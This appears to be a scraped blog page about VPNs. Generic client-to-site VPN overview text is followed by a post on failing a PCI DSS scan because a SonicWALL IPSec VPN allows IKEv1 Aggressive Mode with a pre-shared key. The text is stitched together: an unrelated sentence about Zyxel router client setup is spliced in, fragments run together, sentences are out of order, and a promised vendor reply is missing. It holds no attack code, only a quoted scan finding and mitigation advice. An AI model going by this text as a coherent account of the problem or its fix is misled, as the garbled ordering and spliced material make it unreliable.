A remote access VPN (client-to-site) allows employees who are traveling or teleworkers, secure access to company network resources. VPNs are used to transport traffic over the internet of any insecure network that uses TCP/IP communications. OverviewĪ VPN (virtual private network) provides a secure communication between sites without the expense of leased lines. Fixing a PCI DSS scan failure on the SonicWALL IPSec VPN, part oneĪn IPSec VPN using pre-shared secret for authentication will fail PCI DSS security scans.This guide will assist in the configuration of the IPSecuritas VPN Client (version 4.6.1) for VPN connectivity with Zyxel's Next-Gen ZyWALL USG routers. Here's how to switch to using certificates on the router and the VPN client to pass the scan. In my previous post on passing Payment Card Industry Data Security Standard (PCI DSS) external vulnerability scans I mentioned two unresolved scan failures, both connected with VPN access. In one case, the SSL VPN appliance, there was no solution with the existing hardware. Although we’re still running that box, its days are numbered. The second problem was with the IPSec VPN (sometimes referred to as a “normal” or “traditional” VPN to distinguish it from Secure Sockets Layer, or SSL, VPN) on our SonicWALL router. The users testing it out had found it faster and more reliable than the SSL VPN, so I really wanted to keep it. To begin with, what’s the problem? The PCI DSS scan reported this: The problem was that solving the scan failure looked horrendously complicated. Synopsis: The remote IKEv1 service supports Aggressive Mode with Pre-Shared key. Impact: The remote Internet Key Exchange (IKE) version 1 service seems to support Aggressive Mode with Pre-Shared key (PSK) authentication. Such configuration could allow an attacker to capture and crack the PSK of a VPN gateway and gain unauthorized access to private networks. – Do not use Pre-Shared key for authentication if possible. – If using Pre-Shared key cannot be avoided, use very strong keys. – If possible, do not allow VPN connections from any IP addresses. I smiled at the advice to “use very strong keys” because the security scan is automated and will fail on this issue no matter how strong the key is. Why does the SonicWALL even allow such a vulnerable configuration? When I logged the problem with SonicWALL, they didn’t answer that question but they did tell me: What didn’t make me smile, however, was the fact that this vulnerability has been known for over 10 years (that’s what the CVE number tells you).
0 Comments
Leave a Reply. |